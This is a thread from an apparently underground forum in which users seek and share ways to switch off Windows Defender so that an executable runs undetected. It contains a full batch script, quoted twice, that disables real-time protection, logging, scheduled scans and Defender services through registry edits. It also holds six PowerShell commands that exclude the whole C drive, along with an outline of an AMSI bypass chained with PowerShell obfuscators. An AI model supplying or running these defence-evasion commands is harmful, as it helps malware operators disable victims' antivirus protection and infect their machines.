What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Batch Script for Windows Defender Exclusion - Looking for it

xcrew1990

Light Weight
Депозит
$0
I'm looking for a batch script that can bypass defender and Exclude thhe whole "C" partition from it permanently. Need to run exe undetected.
Seems the usual powershell.exe -command "Add-MpPreference -ExclusionExtension exe" is being detected nowadays.
Последнее редактирование: 20.02.2024
 
Код:
Скопировать в буфер обмена
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
rem 0 - Disable Logging
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
rem Disable WD Tasks
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
rem Disable WD systray icon
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
rem Remove WD context menu
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
rem Disable WD services
rem For these to execute successfully, you may need to boot into safe mode due to tamper protect
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem added the following on 07/25/19 for win10v1903
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
 
KernelMode сказал(а):
Код:
Скопировать в буфер обмена
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
rem 0 - Disable Logging
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
rem Disable WD Tasks
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
rem Disable WD systray icon
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
rem Remove WD context menu
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
rem Disable WD services
rem For these to execute successfully, you may need to boot into safe mode due to tamper protect
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem added the following on 07/25/19 for win10v1903
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
Нажмите, чтобы раскрыть...

can i pm you ? you seem very knowladgeable in coding specially encrypting and i need to get some answers or small guide
 
Code an AMSI bypass in .NET then do CLR Invoke from powershell with .NET bytecode. Use Chimera on the powershell CLR Invoke script + a simple custom powershell crypter or use betterxencrypt.ps1 then Chimeria again.

And you can sneak in any powershell code on it afterwards. Including the Add-MpPrefrence exclusion.
 
xmarina сказал(а):
Code an AMSI bypass in .NET then do CLR Invoke from powershell with .NET bytecode. Use Chimera on the powershell CLR Invoke script + a simple custom powershell crypter or use betterxencrypt.ps1 then Chimeria again.

And you can sneak in any powershell code on it afterwards. Including the Add-MpPrefrence exclusion.

am not experienced, mind showing on telegram at a fee? Please send me PM
 
xcrew1990 сказал(а):
I'm looking for a batch script that can bypass defender and Exclude thhe whole "C" partition from it permanently. Need to run exe undetected.
Seems the usual powershell.exe -command "Add-MpPreference -ExclusionExtension exe" is being detected nowadays.

I was about typing what you just said. but i want a loader that would do that then after few min exec another exe.
 
This will only work on older versions of windows anything below windows 10 any build after that has tamper protection enabled by default that makes this not possible. Tamper protection blocks reg edit or the the use of MpPreference/all command line options to change defender settings. Powershell still works fine on any system without tamper protection. No need for a .bat file that's easier to detect vs a command.


Это будет работать только на более старых версиях Windows, все, что ниже Windows 10, любая сборка после этого имеет включенную защиту от несанкционированного доступа по умолчанию, что делает это невозможным. Защита от несанкционированного доступа блокирует редактирование реестра или использование параметров командной строки MpPreference/all для изменения настроек защитника. Powershell по-прежнему отлично работает в любой системе без защиты от несанкционированного доступа. Нет необходимости в.bat файле, который легче обнаружить, чем команда.
Последнее редактирование: Сегодня в 03:40
 
ZeroCorp сказал(а):
This will only work on older versions of windows anything below windows 10 any build after that has tamper protection enabled by default that makes this not possible. Tamper protection blocks reg edit or the use of MpPreference/all command line options to change defender settings. Powershell still works fine on any system without tamper protection. No need for a .bat file that's easier to detect vs a command.


This will only work on older versions of Windows, anything below Windows 10, any build after that has tamper protection enabled by default making this impossible. Tamper Protection prevents editing the registry or using the MpPreference/all command line options to change defender settings. Powershell still works fine on any system without tamper protection. There is no need for a .bat file, which is easier to detect than a command.

So how to bypass defender permanently?
 
ZeroCorp сказал(а):
This will only work on older versions of windows anything below windows 10 any build after that has tamper protection enabled by default that makes this not possible. Tamper protection blocks reg edit or the the use of MpPreference/all command line options to change defender settings. Powershell still works fine on any system without tamper protection. No need for a .bat file that's easier to detect vs a command.


Это будет работать только на более старых версиях Windows, все, что ниже Windows 10, любая сборка после этого имеет включенную защиту от несанкционированного доступа по умолчанию, что делает это невозможным. Защита от несанкционированного доступа блокирует редактирование реестра или использование параметров командной строки MpPreference/all для изменения настроек защитника. Powershell по-прежнему отлично работает в любой системе без защиты от несанкционированного доступа. Нет необходимости в.bat файле, который легче обнаружить, чем команда.

редактирование реестра либо через powershell добавление в исключение работает на всех версия по крайней мере на серверных и на десятке работает с правами админа.

а отключение дефендера вообще нет смысла да и палевно это лучше просто в исключение весь диск добавить и все
 
Dark_TM сказал(а):
editing the registry or adding it to an exception via powershell works on all versions, at least on server versions and on the top ten it works with admin rights.

but disabling the Defender makes no sense at all, and it’s too bad it’s better to just add the entire disk as an exception and that’s it

Adding entire disk using Add-MpPreference is being blocked by latest defender. Any other way?
 
Код:
Скопировать в буфер обмена
1)
Add-MpPreference -ExclusionPath "C:\"
2)
Set-MpPreference -ExclusionPath "C:\"
3)
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -Force
4)
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -PropertyType String -Force
5)
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\"
6)
powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"
 
Dark_TM сказал(а):
Код:
Скопировать в буфер обмена
1)
Add-MpPreference -ExclusionPath "C:\"
2)
Set-MpPreference -ExclusionPath "C:\"
3)
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -Force
4)
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -PropertyType String -Force
5)
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\"
6)
powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"
Нажмите, чтобы раскрыть...

если у учетки права админа то диск добавится в исключение.
 
Top